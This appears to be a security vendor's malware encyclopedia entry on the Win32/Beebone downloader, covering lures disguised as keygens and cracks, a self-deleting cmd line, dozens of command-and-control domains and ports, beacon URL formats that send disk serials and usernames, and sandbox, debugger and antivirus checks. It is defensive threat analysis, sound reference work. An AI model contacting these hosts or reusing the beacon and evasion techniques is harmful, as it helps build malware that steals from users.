Installation
Some of these threat variants can get onto your PC from drive-by download activities through some social engineering tactics. It might have been downloaded and run by other malware, such as a variant of the Worm:Win32/Vobfus family.
Other variants might be installed if you click any of the following:
- A malicious link posted on social networking sites
- A malicious link sent through an instant messaging program
- A link with an enticing file name that might have been shared on a public file sharing network
We have seen variants use the following names, which indicate they are trying to appear as software key generators or cracks:
- 360Amigo System Speedup 1.2.1.5800 Pro Portable.exe
- 4 Elements II - Collector's Edition - Full PreCracked.exe
- 4U Download YouTube Video 4.2.8.exe
- 7 Wonders IV Magical Mystery Tour (Final).exe
- A Selection of Courses for SolidWorks SolidProfessor Completed DVD 2011-CWZ.exe
- Abvent Artlantis Studio v3.0.6-BEAN.exe
- Ace Combat Assault Horizon KEYGEN CRACK for PC - MAC - PS.exe
- Acrobat X Pro 10 (Portable).exe
- Adobe Acrobat Pro X 10.0.1.434.exe
Payload
Downloads other malware
This threat contacts remote hosts to download other malware. We have seen this threat download the following:
For more information about how it downloads this malware, see the Additional information section below.
After it downloads other malware, it stops running, and deletes the copy of itself by running the following command:
"cmd.exe /c tasklist&&del {Malware Path}"
Contacts remote hosts
In the wild, we have seen that Win32/Beebone tries to connect to the following hosts:
- 3d-game.com
- 65512.eu
- adultdns.net
- bbsindex.com
- brenz.pl
- checktech.eu
- checkusb.eu
- chkdtdns.net
- cpuchecks.com
- ddns01.com
- ddns01.eu
- ddns1.eu
- ddnsd.at
- ddnsd.eu
|
- ddnsx.eu
- dnsd.me
- dtdns.net
- etowns.net
- fe100.net
- grsyl.com
- kdns01.kz
- no-ip1.com
- noip.at
- noip01.org
- noip02.com
- noip1.at
- noip1.com
- noip1.de
|
- noip1.info
- noip1.nl
- noip1.org
- noip2.at
- noip2.com
- noip2.net
- noip2.nl
- noips.me
- noipx.net
- noipz.com
- noipz.net
- noipz.org
- phone423checker.tk
- s3h.net
|
- selfip.me
- slyip.com
- somee.com
- ssh01.com
- suroot.com
- time2check.info
- ttl60.org
- vigg.net
- voip01.com
- wiggy.me
- wow64.net
- zdns.eu
- zigg.me
- zma.me
|
Some of the hosts appear to be using domain names similar to dynamic DNS service providers.
These threats use the following ports to access the remote servers:
- 443
- 8080
- 23345
- 27000
- 30980
|
- 34511
- 40009
- 41001
- 43401
- 46361
|
- 58897
- 60077
- 60088
- 60099
- 60777
|
The malware family might access those domains and remote servers to:
- Download and run files (including updates or other malware).
- Report a new infection to its author.
- Receive configuration or other data.
- Receive instructions from a malicious hacker.
- Upload information taken from your PC.
While some of these servers are located in eastern Europe, we have seen the threat generally targeting users in the US, South America and Asia. Peru, Mexico, and the US have the largest infection numbers, while infections in Europe are not high.
For more information about how it contacts these remote hosts, see the Additional information section below.
This malware family might also have the following executable icon:
Additional information
Older variants of this malware family shows the following behavior when they run:
| Malware behavior |
Examples |
|
Makes an HTTP request, usually in the following format:
{random}.{domain}:{port}/{letter}/
|
- 001updates.zma.me:23345/b/
- updates9845.fe100.net:60077/i/
- updateminute.dnsd.me:8080/b/
- windows-update.zigg.me:41001/a/
- winupdateserver1.s3h.net:30980/a/
|
|
The server replies to the HTTP request with a comma-separated list of the locations where Beebone can download malicious files to your computer.
|
It can send an HTTP request to the following URI:
- windows-update.zigg.me:41001/a/
|
|
The server then replies with a comma-separated list that looks like this:
76876332/1,76876332/2,76876332/bb1,76876332/z
|
The download file locations are:
- windows-update.zigg.me:41001/a/76876332/1
- windows-update.zigg.me:41001/a/76876332/2
- windows-update.zigg.me:41001/a/76876332/bb1
- windows-update.zigg.me:41001/a/76876332/z
|
Recent variants of this threat family shows the following behavior when they run:
| Malware behavior |
Examples |
|
Makes an HTTP request in the following format:
{random}.{domain}:{port}/{number}/?
{affiliate_id}|{hdserial}{username}
|
- 37462.ddnsx.eu:443/1/?b|-2020396961winxp
- 37480.noip1.at:443/2/?f|-1396129654Guest
- 46546.dtdns.net:443/9/?a|-1312965453MyPC
- 62951.noipx.net:8080/0/?f|-2713912961Developer
- 86788.noip1.com:8080/0/?b|-5711296542Windows7
- 88793.ddns1.eu:443/1/?a|-1296545361Administrator
- 99088.noip2.net:8080/0/?f|-1813912965Admin
|
|
Other variants make an HTTP request using IP addresses, using the following format:
http://{ip address}:{port}/{random numbers}/?{first letter of malware’s filename}|{hd_serial}{username}
|
- hxxp://146.255.195.124:60002/8567645/?m|-1234567890Administrator
- hxxp://91.237.247.11:37766/771232/?j|-2345678901GuestUser01
|
|
Uses specific HTTP UserAgent when requesting to the malware server.
|
It uses the following User Agent string:
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)"
|
|
The malware replies back to the HTTP request with encrypted data.
The encrypted data are decrypted, showing a comma-separated URL list of the files to be downloaded to your computer.
|
The decrypted data might look like the following:
899056.noip2.nl:443/v/?75,hxxp://799056.noip2.nl:443/1/?n1,hxxp://799056.noip2.nl:443/1/?s1
|
|
The downloaded files are also encrypted, but will later be decrypted, then saved to your computer.
|
File names of the downloaded files can have the following format:
- {number}{random}.exe, or
- z{random}.exe, or
- start1.exe, or
- runme.exe
|
|
Runs the saved files, most often from the %USERPROFILE% folder.
|
|
|
Checks for the following modules. If any of these modules are present in memory, Beebone will not run its malicious routine.
These modules are checked to determine if:
- The malware is being debugged (dbghelp.dll)
- The malware is in a sandbox (sbiedll.dll)
- AVAST antivirus (snxhk.dll) is running in the system
|
- dbghelp.dll
- sbiedll.dll
- snxhk.dll
|
|
Checks to see if your computer is running in a virtual machine environment by checking for the following string in the registry key "HKLM\System\ControlSet001\Services\Disk\Enum\0".
If it finds any of the sample strings, the trojan will not run.
|
|
|
Uses anti-debugging techniques.
|
If one of the above DLLs are running on your computer, Beebone will not run its malicious routine.
It checks the snxhk.dll module to determine if AVAST antivirus is installed on your computer.
|
In the wild, we have seen these threats use the following file names:
- 0wxm.exe
- 1hhy.exe
- 2gy.exe
- 4meu.exe
- 5rry.exe
- zyyp.exe
The names of the downloaded files are now using the format: {random numbers}.exe.
Example:
These files might be detected as variants of the following families:
Related reading
Analysis by Allan Sepillo
